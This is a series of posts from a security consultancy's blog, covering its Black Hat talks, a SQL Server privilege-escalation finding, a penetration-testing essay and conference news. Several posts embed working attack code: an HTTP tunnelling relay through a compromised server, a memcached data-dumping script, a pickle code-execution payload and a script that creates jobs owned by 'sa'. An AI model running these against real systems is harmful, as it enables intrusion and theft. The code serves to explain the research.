
Sat, 1 Jun 2013

Honey, I’m home!! - Hacking Z-Wave & other Black Hat news

You've probably never thought of this, but the home automation market in the US was worth approximately $3.2 billion in 2010 and is expected to exceed $5.5 billion in 2016.


Under the hood, the Zigbee and Z-Wave wireless communication protocols are the most commonly used RF technologies in home automation systems. Zigbee is based on an open specification (IEEE 802.15.4) and has been the subject of several academic and practical security research efforts. Z-Wave is a proprietary wireless protocol that operates in the Industrial, Scientific and Medical (ISM) radio band. It transmits on the 868.42 MHz (Europe) and 908.42 MHz (United States) frequencies and is designed for low-bandwidth data communications in embedded devices such as security sensors, alarms and home automation control panels.


Unlike Zigbee, almost no public security research has been done on the Z-Wave protocol, except for a DefCon 2011 talk in which the presenter pointed to the possibility of capturing the AES key exchange ... until now. Our Black Hat USA 2013 talk explores the question of Z-Wave protocol security and shows how the Z-Wave protocol can be subjected to attacks.


The talk is being presented by Behrang Fouladi, a Principal Security Researcher at SensePost, with some help on the hardware side from our friend Sahand Ghanoun. Behrang is one of our most senior and most respected analysts. He loves poetry, movies with Owen Wilson, snowboarding and long walks on the beach. Wait - no - that's me. Behrang's the guy who lives in London and has a Masters from Royal Holloway. He's also the guy who figured out how to clone the SecurID software token.


Amazingly, this is the 11th time we've presented at Black Hat Las Vegas. We try to keep track of our talks and papers at conferences on our research services site, but for your reading convenience, here's a summary of our Black Hat talks over the last decade:



2002: Setiri : Advances in trojan technology (Roelof Temmingh)


Setiri was the first publicized trojan to implement the concept of using a web browser to communicate with its controller and caused a stir when we presented it in 2002. We were also very pleased when it was referenced in a 2004 book by Ed Skoudis.


2003: Putting the tea back into cyber terrorism (Charl van der Walt, Roelof Temmingh and Haroon Meer)


A paper about targeted, effective, automated attacks that could be used in countrywide cyber terrorism. A worm that targets internal networks was also discussed as an example of such an attack. In some ways, the thinking in this talk eventually led to the creation of Maltego.


2004: When the tables turn (Charl van der Walt, Roelof Temmingh and Haroon Meer)


This paper presented some of the earliest ideas on offensive strike-back as a network defence methodology, which later found their way into Neil Wyler's 2005 book "Aggressive Network Self-Defence".


2005: Assessment automation (Roelof Temmingh)


Our thinking around pentest automation, and in particular footprinting and link analysis, was further expanded upon. Here we also released the first version of our automated footprinting tool, "Bidiblah".


2006: A tail of two proxies (Roelof Temmingh and Haroon Meer)


In this talk we literally did introduce two proxy tools. The first was "Suru", our HTTP MITM proxy and a then-contender to the @stake Web Proxy. Although Suru has long since been surpassed by excellent tools like Burp Proxy, it introduced a number of exciting new concepts, including trivial fuzzing, token correlation and background directory brute-forcing. Further improvements included timing analysis and indexable directory checks. These were not available in other commercial proxies at the time, hence our need to write our own.


Another pioneering MITM proxy - WebScarab from OWASP - also shifted thinking at the time. It was originally written by Rogan Dawes, our very own pentest team leader.


The second proxy we introduced operated at the TCP layer, leveraging the excellent Scapy packet manipulation program. We never took that any further, however.


2007: It's all about timing (Haroon Meer and Marco Slaviero)


This was one of my favourite SensePost talks. It kicked off a series of research projects concentrating on timing-based inference attacks against all kinds of technologies and introduced a weaponized timing-based data exfiltration attack in the form of our Squeeza SQL Injection exploitation tool (you probably have to be South African to get the joke). This was also the first talk in which we Invented Our Own Acronym.


2008: Pushing a camel through the eye of a needle (Haroon Meer, Marco Slaviero & Glenn Wilkinson)


In this talk we expanded on our ideas of using timing as a vector for data extraction in so-called 'hostile' environments. We also introduced our 'reDuh' TCP-over-HTTP tunnelling tool. reDuh is a tool that can be used to create a TCP circuit through validly formed HTTP requests. Essentially this means that if we can upload a JSP/PHP/ASP page onto a compromised server, we can connect to hosts behind that server trivially. We also demonstrated how reDuh could be implemented under OLE right inside a compromised SQL 2005 server, even without 'sa' privileges.
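
To make the idea concrete, here is a heavily simplified sketch (not reDuh's actual wire format; the tunnel URL and base64 encoding are assumptions for illustration) of how TCP-over-HTTP tunnelling works: a local listener accepts a TCP connection and relays its bytes back and forth as well-formed HTTP POSTs to a page on the compromised server, which in turn talks to the internal host on our behalf.

```python
import base64
import socket
import urllib.request

# Hypothetical endpoint: the uploaded JSP/PHP/ASP page that forwards our bytes
# to an internal host and returns whatever that host sent back.
TUNNEL_URL = "http://compromised.example.com/tunnel.jsp"

def exchange(data: bytes) -> bytes:
    """POST outbound bytes to the tunnel page; return the inbound bytes."""
    req = urllib.request.Request(TUNNEL_URL, data=base64.b64encode(data))
    with urllib.request.urlopen(req, timeout=10) as resp:
        return base64.b64decode(resp.read())

# Local listener: whatever connects to 127.0.0.1:8000 gets relayed, one poll
# at a time, through validly formed HTTP requests.
listener = socket.socket()
listener.bind(("127.0.0.1", 8000))
listener.listen(1)
client, _ = listener.accept()
client.settimeout(0.5)

while True:
    try:
        outbound = client.recv(4096)
        if not outbound:        # local side closed the connection
            break
    except socket.timeout:
        outbound = b""          # nothing to send; still poll for replies
    inbound = exchange(outbound)
    if inbound:
        client.sendall(inbound)
```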


2009: Clobbering the cloud (Haroon Meer, Marco Slaviero and Nicholas Arvanitis)


Yup, we did cloud before cloud was cool. This was a presentation about security in the cloud. Cloud security issues such as privacy, monoculture and vendor lock-in were discussed, and the cloud offerings from Amazon, Salesforce and Apple, as well as their security, were examined. We got an email from Steve "Woz" Wozniak, we quoted Dan Geer and we had a photo of Dino Dai Zovi. We built an HTTP brute-forcer on Force.com and (best of all) we hacked Apple using an iPhone.


2010: Cache on delivery (Marco Slaviero)


This was a presentation about mining information from memcached. We introduced go-derper.rb, a tool we developed for hacking memcached servers, and gave a few examples, including a sexy hack of bps.org. It seemed like people weren't getting our point at first, but later the penny dropped and, to date, the presentation has had almost 50,000 views on Slideshare.
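
For readers who haven't looked at memcached before, the sketch below illustrates the kind of enumeration that go-derper.rb automates (this is our own illustrative script, not go-derper itself; target details are placeholders): memcached speaks an unauthenticated plain-text protocol, so anyone who can reach the port can list item slabs, dump key names via the undocumented 'stats cachedump' command and fetch the values.

```python
import re
import socket

def mc_command(host, port, cmd, timeout=5):
    """Send a single command to memcached and return the raw text response."""
    s = socket.create_connection((host, port), timeout=timeout)
    s.sendall(cmd.encode() + b"\r\n")
    data = b""
    while not data.endswith((b"END\r\n", b"OK\r\n", b"ERROR\r\n")):
        try:
            chunk = s.recv(4096)
        except socket.timeout:
            break
        if not chunk:
            break
        data += chunk
    s.close()
    return data.decode(errors="replace")

host, port = "127.0.0.1", 11211   # target details are placeholders

# 1. Which slabs currently hold items?
slabs = set(re.findall(r"STAT items:(\d+):", mc_command(host, port, "stats items")))

# 2. Dump up to 100 key names per slab ('stats cachedump' is undocumented).
for slab in sorted(slabs, key=int):
    dump = mc_command(host, port, "stats cachedump %s 100" % slab)
    # 3. Fetch each key with an ordinary get and print whatever comes back.
    for key in re.findall(r"ITEM (\S+)", dump):
        print(mc_command(host, port, "get %s" % key))
```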


2011: Sour pickles (Marco Slaviero)


Python's Pickle module provides a known capability for running arbitrary Python functions and, by extension, permitting remote code execution; however, there is no public Pickle exploitation guide and published exploits are simple examples only. In this paper we described the Pickle environment, outlined hurdles facing a shellcoder and provided guidelines for writing Pickle shellcode. A brief survey of public Python code was undertaken to establish the prevalence of the vulnerability, and a shellcode generator and Pickle mangler were written. Output from the paper included helpful guidelines and templates for shellcode writing, tools for Pickle hacking and a shellcode library. We also wrote a very fancy paper about it all...
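
For readers who want the one-line version of why Pickle is dangerous, the snippet below shows the underlying primitive the paper builds on (a minimal illustration, not the shellcode techniques from the talk): any object whose class defines __reduce__ can instruct the unpickler to call an arbitrary callable, so unpickling untrusted data amounts to code execution.

```python
import os
import pickle

class Exploit:
    # __reduce__ tells the unpickler which callable to invoke, and with which
    # arguments, while "reconstructing" the object.
    def __reduce__(self):
        return (os.system, ("id",))   # harmless here; an attacker runs anything

payload = pickle.dumps(Exploit())

# The "victim" only has to unpickle attacker-supplied bytes for the call to run.
pickle.loads(payload)
```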


We didn't present at Black Hat USA in 2012, although we did do some very cool work that year.


For this year's show we'll be back on the podium with Behrang's talk, as well as an entire suite of excellent training courses. To meet the likes of Behrang and the rest of our team, please consider one of our courses. We need all the support we can get and we're pretty convinced you won't be disappointed.


See you in Vegas!

Wed, 8 Aug 2012

Privilege Escalation in SQL Server (Depending on some dodgy requirements)

I was playing with a few SQL server idiosyncrasies more than a year ago before becoming so completely distracted with the whole SAP protocol-decoding business. Having some time on my hands for once, I thought I would blog it.

Early last year, I found that it was possible for an unprivileged user to create jobs owned by other users on MS SQL Server (2000, 2005 and 2008) - provided the user had the capability of creating or altering stored procedures in the [master].[dbo] schema. The reason for this is that cross-database permissions are chained, by default, across the system databases [master], [msdb] and [tempdb]. According to Microsoft, this is by design.
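
If you want to check this on your own servers, the per-database chaining flag is exposed in sys.databases on SQL Server 2005 and later. The sketch below (Python with pyodbc; the driver name and connection details are placeholders) simply lists the flag for every database - on a default install the system databases mentioned above report it as enabled.

```python
import pyodbc

# Driver name and connection details are placeholders for the example.
conn = pyodbc.connect(
    "DRIVER={ODBC Driver 17 for SQL Server};"
    "SERVER=sqlserver.example.com;UID=eoppoc;PWD=password"
)

# sys.databases exposes the cross-database ownership chaining flag per database
# (SQL Server 2005 and later).
for name, chaining in conn.execute(
    "SELECT name, is_db_chaining_on FROM sys.databases ORDER BY database_id"
):
    print("%-12s cross-db chaining: %s" % (name, "ON" if chaining else "off"))
```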

The issue is that, should a lower-privileged user have the capability of creating or altering stored procedures within [master].[dbo], it becomes possible to insert records into the [msdb].[dbo].[sysjobs*] tables by executing that stored procedure - even without having any direct access to insert records into these tables. This is not particularly different from the system stored procedures (such as sp_addjob) which allow users to create jobs, but the difference lies in the data we're allowed to populate.

SQL Server allows jobs and job steps to be executed under the context of specific user accounts. Whilst the majority of users are (by default) able to schedule jobs on the SQL Server, they can only schedule jobs which execute under their own account context, and only members of the sysadmin server role can add jobs which execute under the context of other user accounts. The underlying system stored procedures provided by Microsoft (sp_addjob and similar) prevent this functionality from being abused by lower-privileged users. However, should it be possible to create or alter a stored procedure within [master].[dbo], we can insert records into the various [msdb] job tables with data of our choosing.

Hard-coding the [owner_sid] field in [msdb].[dbo].[sysjobs] to 0x01 (the default sid for the 'sa' user account) and the [database_user_name] field in [msdb].[dbo].[sysjobsteps] to 'sa' will allow us to create a job and associated job-step owned by the 'sa' user even though we are using an unprivileged account and do not have any permissions on the underlying tables.

In the following image, user eoppoc has no direct access to [msdb].[dbo].[sysjobs].

Executing a stored procedure, however, allows this access.

The following two images show the job created as user 'sa', with a single job step configured to execute as user 'sa'.
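
In script form, the behaviour shown in those screenshots looks roughly like the sketch below. Note that the connection details are placeholders and [master].[dbo].[sp_add_sa_job] is a hypothetical procedure name standing in for the procedures in the downloadable zip; the direct INSERT is expected to fail with a permission error, while executing the procedure in [master].[dbo] succeeds thanks to the chained permissions.

```python
import pyodbc

# Placeholder connection string for the low-privileged user (eoppoc).
conn = pyodbc.connect(
    "DRIVER={ODBC Driver 17 for SQL Server};"
    "SERVER=sqlserver.example.com;UID=eoppoc;PWD=password",
    autocommit=True,
)
cur = conn.cursor()

# 1. A direct insert into the job tables is denied for the unprivileged user.
try:
    cur.execute(
        "INSERT INTO msdb.dbo.sysjobs (name, owner_sid) VALUES (N'direct', 0x01)"
    )
except pyodbc.Error as err:
    print("Direct insert denied, as expected:", err)

# 2. Executing a stored procedure that lives in [master].[dbo] succeeds, because
#    permissions are chained across the system databases. The procedure name is
#    hypothetical and stands in for the procedures in the downloadable zip.
cur.execute("EXEC master.dbo.sp_add_sa_job @name = N'owned_by_sa'")
print("Job and job step created with owner 'sa'.")
```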

Honestly, I don't really see this as any form of issue. In order for it to be exploitable, there are far too many prerequisites and requirements and these prerequisites open other cans of worms. Furthermore, whilst one has the capability to schedule jobs to run as other users, one does not have the privilege level required to update the job cache. This means the newly created and scheduled job will only run after the SQL Server Agent has been restarted. It is nevertheless interesting and blog-worthy. And who knows, maybe this will be interesting / useful to somebody.

A zip file containing a procedure for SQL2000, and a procedure for SQL2005/2008 can be downloaded from here.

Oh - as a final note, Microsoft mentions that: "These databases are strictly system databases and is recommended not to create any user objects in these databases".

/ian

Wed, 9 May 2012

Pentesting in the spotlight - a view

As 44Con 2012 starts to gain momentum (we'll be there again this time around) I was perusing some of the talks from last year's event...

It was a great event with some great presentations, including (if I may say) our own Ian de Villiers' *Security Application Proxy Pwnage*. Another presentation that caught my attention was Haroon Meer's *Penetration Testing considered harmful today*. In this presentation Haroon outlines concerns he has with penetration testing and suggests some changes that could be made to the way we test in order to improve the results we get. As you may know, a core part of SensePost's business, and my career for almost 13 years, has been security testing, and so I followed this talk quite closely. The talk raises some interesting ideas and I felt I'd like to comment on some of the points he was making.

As I understood it, the talk's hypothesis could be (over) simplified as follows:

  1. Despite all efforts the security problem is growing and we're heading towards a 'security apocalypse';
  2. Penetration Testing has been presented as a solution to this problem;
  3. Penetration Testing doesn't seem to be working - we're still just one 0-day away from being owned - even for our most valuable assets;
  4. One of the reasons for this is that we don't cater for the 0-day, which is a game-changer. 0-day is sometimes overemphasized, but mostly it's underemphasized, making the value of the test spurious at best;
  5. There are some ways in which this can be improved, including the use of '0-day cards', which allow the tester to emulate the use of a 0-day on a specific system without needing to actually have one. Think of this like a joker in a game of cards.
To begin with, let's consider the term "Penetration Testing", which sits at the core of the hypothesis. This term is widely used to express a number of security testing methodologies and could also be referred to as "attack & penetration", "ethical hacking", "vulnerability testing" or "vulnerability assessment". At SensePost we use the latter term, and the methodology it expresses includes a number of phases of which 'penetration testing' - the attempt to actually leverage the vulnerabilities discovered and practically demonstrate their potential impact to the business - is only one. The talk did not specify which definition of Penetration Test he was using. However, given the emphasis later in the talk on the significance of the 0-day and 'owning' things, I'm assuming he was using the most narrow, technical form of the term. It would seem to me that this already impacts much of his assertion: there are of course cases where a customer simply wants us to 'own' something, or some things, but most often penetration testing is performed within the context of some broader assessment within which many of Haroon's concerns may already be being addressed. As the talk pointed out, there are instances where the question is asked "can we be breached?", or "can we be breached without detecting it?". In such cases a raw "attack and penetration" test can be exactly what's needed; indeed it's a model that's been used by the military for decades. However, for the most part penetration testing should only be used as a specific phase in an assessment and to achieve a specific purpose. I believe many services companies, including our own, have already evolved to the point where this is the case.

Next, I'd like to consider the assertion that penetration testing or even security assessment is presented as the "solution" to the security problem. While it's true that many companies do employ regular testing, amongst our customers it's most often used as a part of a broader strategy, to achieve a specific purpose. Security Assessment is about learning. Through regular testing, the tester, the assessment team and the customer incrementally understand threats and defenses better. Assumptions and assertions are tested and impacts are demonstrated. To me the talk's point is like saying that cholesterol testing is being presented as a solution to heart attacks. This seems untrue. Medical testing for a specific condition helps us gauge the likelihood of someone falling victim to a disease. Having understood this, we can apply treatments, change behavior or accept the odds and carry on. Where we have made changes, further testing helps us gauge whether those changes were successful or not. In the same way, security testing delivers a data point that can be used as part of a general security management process. I don't believe many people are presenting testing as the 'solution' to the security problem.

It is fair to say that the entire process within which security testing functions is not having the desired effect; hence the talk's reference to a "security apocalypse". The failure of security testers to communicate the severity of the situation in language that business can understand surely plays a role here. However, it's not clear to me that the core of this problem lies with the testing component.

A significant and interesting component of the talk's thesis has to do with the role of the "0-day" in security and testing. He rightly points out that even a single 0-day in the hands of an attacker can completely change the result of the test and therefore the situation for the attacker. He suggests in his talk that the testing teams who do have 0-days are inclined to over-emphasise them, whilst those who don't tend to underemphasize or ignore their impact completely. Reading a bit into what he was saying, you can see the 0-day as a joker in a game of cards. You can play a great game with a great hand, but if your opponent has a joker he's going to smoke you every time. In this the assertion is completely true. The talk goes on to suggest that testers should be granted "0-day cards", which they can "play" from time to time to be granted access to a particular system and thereby illustrate more realistically the impact a 0-day can have. I like this idea very much and I'd like to investigate incorporating it into the penetration testing phase for some of our own assessments.

What I struggle to understand, however, is why the talk emphasizes this particular 'joker' over a number of others that seem apparent to me. For example, why not have a "malicious system administrator" card, a "spear phishing" card, a "backdoor in OTS software" card or a "compromise of upstream provider" card? As the 'compromise' of major UK sites like The Register and the Daily Telegraph illustrates, there are many factors that could significantly alter the result of an attack but that would typically fall outside the scope of a traditional penetration test. These are attack vectors that fall within the victim's threat model but are often outside of their reasonable control. Their existence is typically not dealt with during penetration testing, or even assessment, but also cannot be ignored. This doesn't invalidate penetration testing itself; it simply illustrates that testing is not equal to risk management and that risk management also needs to consider factors beyond the client's direct control.

The solution to this conundrum was touched on in the presentation, albeit very briefly, and it's "Threat Modeling". For the last five years I've been arguing that system- or enterprise-wide Threat Modeling presents us with the ability to deal with all these unknown factors (and more) and perform technical testing in a manner that's both broader and more efficient.

The core of the approach I'm proposing is roughly based on the Microsoft methodology and looks as follows (a small illustrative sketch of the resulting risk register appears after the list):

  1. Develop a model of your target environment, incorporating all players, locations, and interfaces. This is done in close collaboration between the client and the tester, thus incorporating both the 'insider' and the 'outsider' perspective;
  2. Enumerate all potential risks, and map them to the model. This results in a very long and comprehensive list of hypothetical risks, which would naturally include the 0-day, but also all the other 'jokers' that we discussed above;
  3. Sort the list into some order of priority and group similar hypothetical risks together;
  4. Perform tests in order of priority where appropriate to prove or disprove the hypothetical risks;
  5. Remediate, mitigate, insure or inform as appropriate;
  6. Rinse and repeat.
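
As a trivial illustration of steps 2 to 4, the risk register can be as simple as a structured list that gets sorted by priority and updated with the outcome of each test. The entries below are invented examples, not client data:

```python
from dataclasses import dataclass
from typing import Optional

# Invented example entries: a minimal "risk register" covering steps 2 to 4 -
# enumerate hypothetical risks, prioritise them, test, and record the outcome.
@dataclass
class Risk:
    description: str
    priority: int                     # 1 = highest
    tested: bool = False
    confirmed: Optional[bool] = None
    notes: str = ""

register = [
    Risk("0-day against internet-facing web server", priority=1),
    Risk("Malicious system administrator", priority=2),
    Risk("Spear phishing of finance staff", priority=1),
    Risk("Compromise of upstream provider", priority=3),
]

# Step 3: sort so that testing effort follows priority.
register.sort(key=lambda r: r.priority)

# Step 4: record the result of one test (e.g. played as an agreed '0-day card').
register[0].tested = True
register[0].confirmed = True
register[0].notes = "Demonstrated during the assessment."

for r in register:
    status = "untested" if not r.tested else ("confirmed" if r.confirmed else "not confirmed")
    print("[P%d] %s: %s" % (r.priority, r.description, status))
```
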
This approach provides a reasonable balance between solid theoretical risk management and aggressive technical testing that addresses all the concerns raised in the talk about the way penetration testing is done today. It also provides the customer with a concrete register of tested risks that can easily be updated from time-to-time and makes sense to both technical and business leaders.

Threat Modeling makes our testing smarter, broader, more efficient and more relevant and as such is a vital improvement to our risk assessment methodology.

Solving the security problem in total is sadly still going to take a whole lot more work...

ITWeb Security Summit 2012

This year, for the fourth time, some colleagues at SensePost and I have worked together with the team from ITWeb on the planning of their annual Security Summit. A commercial conference is always (I suspect) a delicate balance between the different drivers from business, technology and 'industry', but this year's event is definitely our best effort thus far. ITWeb has, more than ever, acknowledged the centrality of good, objective content and has worked closely with us as the Technical Committee and their various sponsors to strike the optimal balance. I don't think we have it 100% right yet, and there are some improvements and initiatives that will unfortunately only manifest at next year's event, but this year's program (here and here) is nevertheless first class and comparable with almost anything else I've seen.

Dominic White was interviewed for a short video that sums it all up quite nicely.

<Shameless plug>If you're in South Africa and you haven't registered, I highly recommend that you do.</Shameless plug>

This year's Summit explores the idea that trust in cyberspace is "broken" and that, one by one, all the pillars we relied on to tame the Internet and make it a safe place to do business have failed. Basically, the event poses the question: "What now?"

We've tried hard to get all our speakers to align in some way with this theme. Sadly, as is often the case, we had fewer submissions from local experts than we hoped, but we were able to round up a pretty killer program, including a VIP list of visiting stars.

After the plenaries each day, the program is divided into themed tracks where talks on a topic are grouped together. Where possible we've tried to include as many different perspectives and opinions as possible. Here's a brief summary of my personal highlights:

Plenaries:

Mobility:
  • Charl van der Walt (me!) - "What's the deal with Mobile and Africa"
  • Tyrone Erasmus (MWR) - "Pilfering information from the masses"
Enterprise Resource Planning:
  • Juan Pablo Perez Etchegoyen (Onapsis) - "Cyber-Attacks on SAP & ERP systems: Is Our Business-Critical Infrastructure Exposed?"
  • Chris John Riley - "SAP (in)security: Scrubbing SAP clean with SOAP"
  • Ian de Villiers (SensePost) - "Systems Applications Proxy Pwnage"
Electronic Money:
  • Jon Matonis - "Cryptography in a World of Digital Currencies"
Security & Politics:
Finally, there's an excellent-looking full-day workshop titled "Security in an era of BYOD" with Dan Crisp and Lynn Terwoerds.

It's gonna be excellent. See you there!

Tue, 6 Dec 2011

Competition winner announced

On Saturday Dec 3, at BSides Cape Town, we announced the winner of a prize for local information security research. The purpose of the competition was twofold. Firstly, to highlight interesting research produced in .za and publicise up 'n coming security folks, since there are a few disparate communities (academic / industry is the greatest split). Secondly, to provide some degree of reward in the form of a cash prize. The prize is (unsurprisingly) not meant to compensate for time spent, but rather to give the typical researcher, who conducts the work in their spare time, some recognition and perhaps a cool gadget to associate with the work.

The competition was a little disappointing for a single, but significant, reason: the lack of nominations. In all, six people nominated three pieces of work from two researchers. Considering there were four security conferences in South Africa this year, it's clear that only a small fraction of the research produced was considered for the prize. This was a no-strings-attached cash prize; there is no handover of IP or copyright, and no requirements on the winner (though we do offer an interview on our blog to publicise their work, should they choose to). With this in mind, it's strange how few nominations were received; for example, while the competition received some coverage on Twitter, very few nominations originated from there. The timing was tight (the competition was announced two weeks prior to BSides), but that only accounts for a smaller reach, not a lack of involvement.

The two nominees were:

Given the small number of nominations, the panel was composed of three SensePost'ers, Dominic, Ian and myself.

The! winner! of! the! R5000! prize! was! Etienne! Stalmans!

In addition, a finder's fee of R500 was offered to the person who nominated the winning entry. Etienne received two nominations, and so a coin was flipped to determine who got the fee; Samuel Hunter was the winner.

Thanks to Pieter for organising BSides Cape Town and providing us a spot to announce the winners, and thanks to everyone who sent in a nomination. Compliments to both nominees for having their work recognised by others in the community, and congratulations to Etienne for winning the prize.

We remain committed to research and the sponsorship concept, so expect an announcement towards the end of next year and keep an eye open during the year for research that strikes you as interesting.